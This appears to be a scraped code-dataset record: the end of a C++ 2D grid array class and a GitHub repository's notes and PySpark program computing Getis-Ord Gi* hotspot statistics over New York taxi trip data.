vec2(index % sx, index / sx);\n assert(ij.x + (sx * ij.y) == index); // convert back\n return ij;\n }\n\n vec2 wp_from_index(int index) const {\n return worldspace_of(ij_from_index(index));\n }\n\n // TODO rearrange this code\n T max() { return *std::max_element(data.begin(), data.end()); }\n T min() { return *std::min_element(data.begin(), data.end()); }\n T infnorm() {\n T best_val = 0;\n for (auto &d : data) {\n if (std::abs(d) > best_val)\n best_val = std::abs(d);\n }\n return best_val;\n }\n\n inline T lerp(T val1, T val2, float f) {\n return (1.0f - f) * val1 + f * val2;\n }\n\n inline T lerp_2(T val00, T val10, T val01, T val11, vec2 f) {\n return lerp(lerp(val00, val10, f.x), lerp(val01, val11, f.x), f.y);\n }\n\n inline int index_from_ij(vec2 ij) { return ij.x + (sx * ij.y); }\n\n /** The same as (vec2) but it does not interpolate\n * deprecated but i like having it. Note: this forces the coordinates inbound\n */\n T snapped_access(vec2 ij) {\n ivec2 rounded(ij);\n int i = rounded.x;\n int j = rounded.y;\n if (i < 0)\n i = 0;\n if (j < 0)\n j = 0;\n if (i > sx - 1)\n i = sx - 1;\n if (j > sy - 1)\n j = sy - 1;\n int index = i + (sx * j);\n assert(index >= 0);\n assert(index < sx * sy);\n return data[index];\n }\n\n vec2 subcell_coordinates(vec2 ij) {\n ivec2 rounded(ij);\n return ij - vec2(rounded);\n }\n\n /* bilerp takes in a location (in grid coordinates) and returns the\n * interpolated value at the coordinate*/\n T const bilerp(vec2 ij) {\n assert(!std::isnan(ij.x) &&\n !std::isnan(ij.y)); // added in the debugging process\n T val00 = snapped_access(ij);\n T val10 = snapped_access(ij + vec2(1, 0));\n T val01 = snapped_access(ij + vec2(0, 1));\n T val11 = snapped_access(ij + vec2(1, 1));\n return lerp_2(val00, val10, val01, val11, subcell_coordinates(ij));\n }\n\n T value_at(vec2 world_position) {\n return bilerp(coordinates_at(world_position));\n }\n};\n\ntypedef Array2<double> Array2d;\ntypedef Array2<float> Array2f;\ntypedef Array2<int> Array2i;\n"
}
] | 30 |
moyutianque/SIGSPATIAL-20016 | https://github.com/moyutianque/SIGSPATIAL-20016 | 7b92521d2fa0843050834dde57fb21bc1ef16552 | 60d33b8c2e173e49848fc43fcaced075bf4b0647 | 88bb54ff24a1aa15bff2a77b4fe5378d2d783fec | refs/heads/master | 2018-02-10T13:40:31.731409 | 2017-03-06T13:01:55 | 2017-03-06T13:01:55 | 60,661,145 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5916230082511902,
"alphanum_fraction": 0.7696335315704346,
"avg_line_length": 26.285715103149414,
"blob_id": "bdd848ab60c49f3c80f5ecb7e64087912578dbd5",
"content_id": "972e40f287981f91e33d3b8150b4d0a73881778f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 7,
"path": "/referenceCommand.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. ssh operation:\n\n[click here](http://www.cnblogs.com/jiangyao/archive/2011/01/26/1945570.html)\n\n2. hdfs operation:\n\n[click here](https://segmentfault.com/a/1190000002672666#articleHeader4)\n"
},
{
"alpha_fraction": 0.7675438523292542,
"alphanum_fraction": 0.7850877046585083,
"avg_line_length": 44.599998474121094,
"blob_id": "4c6d475733f9a6f902220df996580888f070de77",
"content_id": "8c06ad2ea0c2fdde8d8a3c37e9d37ba87c2f7464",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 228,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 5,
"path": "/README.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "#About install spark in Windows 10 in pycharm\n\nAfter setup the spark, go to the $SPARK_HOME/python and copy the `pyspark` folder into the Python27/lib/site-packages\n\nThen restart the Pycharm, the spark can be use in pycharm now\n"
},
{
"alpha_fraction": 0.5936794877052307,
"alphanum_fraction": 0.7449209690093994,
"avg_line_length": 62.28571319580078,
"blob_id": "05a0dbf8222c735b7c71db2bbb440e0e74e1514c",
"content_id": "4b9f4be08f74562e0cc459ef4b8af28928eae774",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 443,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 7,
"path": "/redecideWork/README.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. In local machine: use the following example command\n\n> spark-submit --master local[*] --executor-memory 6g program.py '/home/summer/Desktop/secondEDI/source/*.csv' 'result0909/result090901.csv' 0.002 0.08\n\n2. In HPC: use the following example command\n\n> spark-submit --master spark://10.119.176.10:7077 --total-executor-cores 15 --executor-memory 50g program0907.py 'hdfs://10.119.176.10:9000/test/source/*.csv' 'result0909.csv' 0.002 0.08\n"
},
{
"alpha_fraction": 0.7561728358268738,
"alphanum_fraction": 0.7808641791343689,
"avg_line_length": 63.79999923706055,
"blob_id": "1ef4cf9d58bba9467998c877b1e1ac6ddf2c485b",
"content_id": "4bcb764091ec36ccd9e0ec9af81e0c27de8e8a8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 5,
"path": "/concept.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. iterables generators and yield in python:\n [link](http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python)\n\n2. find partitions in spark UI: \n [link](https://databricks.gitbooks.io/databricks-spark-knowledge-base/content/performance_optimization/how_many_partitions_does_an_rdd_have.html)\n"
},
{
"alpha_fraction": 0.7979002594947815,
"alphanum_fraction": 0.8267716765403748,
"avg_line_length": 41.33333206176758,
"blob_id": "e2b693fd6eda768095bc43770fc3a19dca9e6a11",
"content_id": "455a172e8c725a481b06ddf3669aa91e7229436a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 9,
"path": "/Error.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. learn to understand spark UI\n\n [Spark UI](https://databricks.com/blog/2015/06/22/understanding-your-spark-application-through-visualization.html)\n\n2. 在main函数以外声明两个全局变量,一个字典类型,一个二维list,字典可以在main里面直接print,而list甚至普通变量在print时会报错,。\n>'java.net.SocketException: Connection reset by peer: socket write error'\n\n\n3. 对于多个rounds的spark程序,只有循环用的global变量会同时变化,其余与该变量相关的全局变量不受影响,故尽量使用少的全局变量.\n"
},
{
"alpha_fraction": 0.4573170840740204,
"alphanum_fraction": 0.48745036125183105,
"avg_line_length": 34.79695510864258,
"blob_id": "14c52effecc0f01dd4a98e89cac931229091369a",
"content_id": "25e011047532da31c57b9d3f3f9b7c9aebc958e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14104,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 394,
"path": "/redecideWork/program.py",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "## Spark Application - execute with spark-submit\n#spark-submit --master spark://10.119.176.10:7077 --total-executor-cores 6 program.py\n# spark-submit --executor-memory 6g program.py \"/home/summer/Desktop/secondEDI/source/*.csv\" \"result1110.csv\" 0.001 0.125\n## Imports\nfrom pyspark import SparkConf, SparkContext,StorageLevel\nfrom collections import namedtuple\nfrom StringIO import StringIO\nfrom datetime import datetime\nfrom operator import add\nfrom math import *\nimport csv\nimport time\nimport os\nimport copy\nfrom heapq import *\nimport sys\n\n## Module Constants\nBlockSize = 8\nexpand = 18\navr_x = 6.67\nINFI = -1000\nstandardDEV = sqrt(196.67)\n\nAPP_NAME = \"My Spark Application\"\nDATE_FMT = \"%Y-%m-%d %H:%M:%S\"\nfields = ('VendorID', 'tpep_pickup_datetime', 'tpep_dropoff_datetime', 'passenger_count', 'trip_distance', \n 'pickup_longitude','pickup_latitude', 'RateCodeID', 'store_and_fwd_flag', 'dropoff_longitude', \n 'dropoff_latitude','payment_type','fare_amount','extra','mta_tax','tip_amount','tolls_amount',\n 'improvement_surcharge','total_amount')\nTaxi = namedtuple('Taxi', fields)\n\n# input items\nPathToInput = sys.argv[1]\nPathToOutput = sys.argv[2]\ncell_size_std = float(sys.argv[3])\nTime_step_std = int(float(sys.argv[4]) * 24)\n\n## File process functions\ndef split(line):\n \"\"\"\n Operator function for splitting a line with csv module\n \"\"\"\n reader = csv.reader(StringIO(line))\n return reader.next()\n\ndef parse(row):\n \"\"\"\n Parses a row and returns a named tuple.\n \"\"\"\n row[0] = int(row[0],0)\n row[1] = datetime.strptime(row[1], DATE_FMT)\n row[2] = datetime.strptime(row[2], DATE_FMT)\n row[3] = int(row[3],0)\n row[4] = float(row[4])\n row[5] = float(row[5])\n row[6] = float(row[6])\n row[7] = int(row[7],0)\n row[9] = float(row[9])\n row[10] = float(row[10])\n row[11] = float(row[11])\n row[12] = float(row[12])\n row[13] = float(row[13])\n row[14] = float(row[14])\n row[15] = float(row[15])\n row[16] = float(row[16])\n row[17] = float(row[17])\n row[18] = float(row[18])\n return Taxi(*row[:19])\n\n## Format change functions\nOriTime = datetime(2009,1,1,0,0,0)\ndef standarizeTime(line):\n cell_x = round((abs(line.pickup_longitude)-0.0)/cell_size_std) \n cell_y = round((line.pickup_latitude-0.0)/cell_size_std)\n TimeDiff = line.tpep_pickup_datetime - OriTime\n cell_z = (TimeDiff.days*24*3600+TimeDiff.seconds)/round(Time_step_std*3600)\n\n cell_x1 = round((abs(line.dropoff_longitude)-0.0)/cell_size_std)\n cell_y1 = round((line.dropoff_latitude-0.0)/cell_size_std)\n TimeDiff2 = line.tpep_dropoff_datetime - OriTime\n cell_z1 = (TimeDiff2.days*24*3600+TimeDiff2.seconds)/round(Time_step_std*3600)\n\n return (((int(cell_x),int(cell_y),int(cell_z)),1),((int(cell_x1),int(cell_y1),int(cell_z1)),1))\n\ndef TransKey(f):\n newList = []\n x=f[0][0]\n y=f[0][1]\n z=f[0][2]\n w=f[1]\n\n kx = x-x%BlockSize\n ky = y-y%BlockSize\n kz = z-z%BlockSize\n\n if x%BlockSize < expand or x%BlockSize >= (BlockSize-expand)\\\n or y%BlockSize < expand or y%BlockSize >= (BlockSize-expand)\\\n or z%BlockSize < expand or z%BlockSize >= (BlockSize-expand):\n #key changes\n kx_upper = (x+expand)-(x+expand)%BlockSize\n kx_lower = (x-expand)-(x-expand)%BlockSize\n ky_upper = (y+expand)-(y+expand)%BlockSize\n ky_lower = (y-expand)-(y-expand)%BlockSize\n kz_upper = (z+expand)-(z+expand)%BlockSize\n kz_lower = (z-expand)-(z-expand)%BlockSize\n\n i=kx_lower\n while i<=kx_upper:\n j=ky_lower\n while j<=ky_upper:\n k=kz_lower\n while k<=kz_upper:\n 
newList.append(((i,j,k),(x,y,z,w)))\n k+=BlockSize\n j+=BlockSize\n i+=BlockSize\n else:\n newList.append(((kx,ky,kz),(x,y,z,w)))\n \n return newList\n\ndef MakeBlock(Block):\n newBlock = [[[0 for z in range(BlockSize+expand*2)] for y in range(BlockSize+expand*2)] for x in range(BlockSize+expand*2)]\n ## change type of x and y and z in key\n standx = Block[0][0] - expand\n standy = Block[0][1] - expand\n standz = Block[0][2] - expand\n \n for cell in Block[1]:\n newBlock[cell[0]-standx][cell[1]-standy][cell[2]-standz] = cell[3]\n \n return (Block[0],newBlock)\n\n## Definition function\ndef Weight(distance):\n w = 1/(distance+1)\n return w\n\ndef Take50th(Block):\n sortHeap = []\n count = 0\n i = 0\n while i<BlockSize:\n j = 0\n while j<BlockSize:\n k = 0\n while k<BlockSize:\n if count < 50:\n heappush(sortHeap,(Block[1][i][j][k][0],i,j,k))\n count += 1\n else:\n if sortHeap[0][0] < Block[1][i][j][k][0]:\n heapreplace(sortHeap,(Block[1][i][j][k][0],i,j,k))\n k+=1\n j+=1\n i+=1\n The50th = sortHeap[0][0]\n return (Block[0],The50th,sortHeap)\n\ndef GenerateFormat(l):\n resultList = []\n # format of cell ((kx,ky,kz),(w,x,y,z))\n for cell in l:\n resultcell = (cell[0][0]+cell[1][1],cell[0][1]+cell[1][2],\n cell[0][2]+cell[1][3],cell[1][0])\n print resultcell\n resultList.append(resultcell)\n return resultList\n\n## Gi function\ndef Gi(Block):\n GiBlock = [[[0 for z in range(BlockSize)] for y in range(BlockSize)] for x in range(BlockSize)]\n boundary=50\n valuedElements = 0\n i = expand\n while i<BlockSize+expand:\n j = expand\n while j<BlockSize+expand:\n k = expand\n while k<BlockSize+expand:\n if Block[1][i][j][k]!=0:\n valuedElements+=1\n if valuedElements>boundary:\n break\n k+=1\n j+=1\n i+=1\n\n if valuedElements<boundary:\n return (Block[0],False)\n else:\n i = expand\n while i<BlockSize+expand:\n j = expand\n while j<BlockSize+expand:\n k = expand\n while k<BlockSize+expand:\n # Do not calculate Gi of cell with attr == 0\n attr = Block[1][i][j][k]\n if attr==0:\n GiBlock[i-expand][j-expand][k-expand] = (INFI,0)\n else:\n NumofCells = 0\n item1 = 0.0\n item2 = 0.0\n item3 = 0.0\n item4 = 0.0\n result = 0.0\n\n l = i-expand\n while l<=i+expand:\n m = j-expand\n while m<=j+expand:\n n = k-expand\n while n<=k+expand:\n attr = Block[1][l][m][n]\n pow_x = (l-i)**2\n pow_y = (m-j)**2\n pow_z = (n-k)**2\n distance = sqrt(pow_x+pow_y+pow_z)\n if attr!=0 and distance<=expand:\n NumofCells+=1\n weight = Weight(distance)\n item1 += weight * attr\n item2 += weight\n item3 += weight**2\n n+=1\n m+=1\n l+=1\n item4 = item2**2\n if NumofCells==1 or NumofCells*item3-item4<=0:\n result = 0.0\n else:\n result = (item1-avr_x*item2)/(standardDEV*sqrt((NumofCells*item3-item4)/(NumofCells-1)))\n GiBlock[i-expand][j-expand][k-expand] = (result,NumofCells,item1,item2,item3)\n\n k+=1\n j+=1\n i+=1\n return (Block[0],GiBlock)\n\ndef updateGi(Block):\n GiBlock = Block[1][0]\n XBlock = Block[1][1]\n\n i = 0\n while i<BlockSize:\n j = 0\n while j<BlockSize:\n k = 0\n while k<BlockSize:\n #attr = XBlock[i+expand][j+expand][k+expand]\n #if attr == 0:\n #GiBlock[i][j][k]=(INFI,0)\n \n if GiBlock[i][j][k][0] == INFI:\n k+=1\n continue\n \n else:\n NumofCells = GiBlock[i][j][k][1]\n item1 = GiBlock[i][j][k][2]\n item2 = GiBlock[i][j][k][3]\n item3 = GiBlock[i][j][k][4]\n result = GiBlock[i][j][k][0]\n Bx = i+expand\n By = j+expand\n Bz = k+expand\n \n l = Bx-expand\n while l<=Bx+expand:\n m = By-expand\n while m<=By+expand:\n n = Bz-expand\n while n<=Bz+expand:\n #begin\n \"\"\"\n if l == Bx-expand or l == Bx+expand\\\n 
or m == By-expand or m == By+expand\\\n or n == Bz-expand or n == Bz+expand:\n \"\"\"\n #s\n attr = XBlock[l][m][n]\n pow_x = (l-Bx)**2\n pow_y = (m-By)**2\n pow_z = (n-Bz)**2\n distance = sqrt(pow_x+pow_y+pow_z)\n if attr != 0 and distance <= expand and distance>(expand-1):\n NumofCells+=1\n weight = Weight(distance)\n item1 += weight * attr\n item2 += weight\n item3 += weight**2\n #end\n n+=1\n m+=1\n l+=1\n\n item4 = item2**2\n if NumofCells > GiBlock[i][j][k][1] and NumofCells*item3-item4>0:\n result = (item1-avr_x*item2)/(standardDEV*sqrt((NumofCells*item3-item4)/(NumofCells-1)))\n GiBlock[i][j][k] = (result,NumofCells,item1,item2,item3)\n k+=1\n j+=1\n i+=1\n return (Block[0],GiBlock)\n \n\n\n## Main function\ndef main(sc):\n ## Remove the first line and the unuseable data of csv\n OriginalRDD = sc.textFile(PathToInput).map(split)\n \n header = OriginalRDD.first()\n def ReduceUnusable(row):\n return row != header and \\\n row[5]!=0 and float(row[5])>-74.25 and float(row[5])<-73.7\\\n and float(row[6])!=0 and float(row[6])>40.5 and float(row[6])<40.9\\\n and row[9]!=0 and float(row[9])>-74.25 and float(row[9])<-73.7\\\n and float(row[10])!=0 and float(row[10])>40.5 and float(row[10])<40.9\n SourceRDD = OriginalRDD.filter(ReduceUnusable).map(parse)\\\n .map(standarizeTime).flatMap(lambda x:x).reduceByKey(add)\\\n .persist(StorageLevel.MEMORY_AND_DISK)\n\n ## Make blocks\n BlockRDD = SourceRDD.map(TransKey).flatMap(lambda x:x).groupByKey()\\\n .mapValues(list).map(MakeBlock)\n \n ## Calculate Gi\n GiRDD = BlockRDD.map(Gi).filter(lambda x:x[1]!=False).persist(StorageLevel.MEMORY_AND_DISK)\n\n FirstRoundSortRDD = GiRDD.map(Take50th).persist(StorageLevel.MEMORY_AND_DISK)\n Standard50th = FirstRoundSortRDD.map(lambda f:f[1]).sortBy(lambda f:f,False).take(1)\n Bstandard50th = sc.broadcast(Standard50th)\n \n def SecondRoundSort(HeapRDD):\n index = 0\n for cell in HeapRDD[2]:\n if cell[0] >= Bstandard50th.value[0]:\n break\n index += 1\n return (HeapRDD[0],HeapRDD[2][index:])\n SecondRoundSortRDD = FirstRoundSortRDD.map(SecondRoundSort)\\\n .filter(lambda f:f[1]!=[]).flatMapValues(lambda x:x)\\\n .sortBy(lambda x:x[1][0],False).take(50)\n \n global expand\n print \"-------------%d\"%(expand)\n ResultList = GenerateFormat(SecondRoundSortRDD)\n writeFileName = PathToOutput\n with open(writeFileName,mode='a') as wf:\n writer = csv.writer(wf)\n writer.writerow('expand%d'%(expand))\n for r in ResultList:\n writer.writerow(r)\n wf.close()\n\n while expand<=20:\n #begin\n expand += 1 \n BlockRDD = SourceRDD.map(TransKey).flatMap(lambda x:x).groupByKey()\\\n .mapValues(list).map(MakeBlock)\n \n GiRDD = GiRDD.join(BlockRDD).map(updateGi).persist(StorageLevel.MEMORY_AND_DISK)\n\n FirstRoundSortRDD = GiRDD.map(Take50th).persist(StorageLevel.MEMORY_AND_DISK)\n Standard50th = FirstRoundSortRDD.map(lambda f:f[1]).sortBy(lambda f:f,False).take(1)\n Bstandard50th = sc.broadcast(Standard50th)\n SecondRoundSortRDD = FirstRoundSortRDD.map(SecondRoundSort)\\\n .filter(lambda f:f[1] != []).flatMapValues(lambda x:x)\\\n .sortBy(lambda x:x[1][0],False).take(50)\n \n print \"-------------%d\"%(expand)\n ResultList = GenerateFormat(SecondRoundSortRDD)\n with open(writeFileName,mode='a') as wf:\n writer = csv.writer(wf)\n writer.writerow('expand%d'%(expand))\n for r in ResultList:\n writer.writerow(r)\n wf.close()\n #end\n\nif __name__ == \"__main__\":\n # Configure Spark\n conf = SparkConf().setAppName(APP_NAME)\n #conf = conf.setMaster(\"local[*]\")\n sc = SparkContext(conf=conf)\n \n # Execute Main functionality\n 
main(sc)\n\nraw_input(\"end...............\")\n"
}
] | 6 |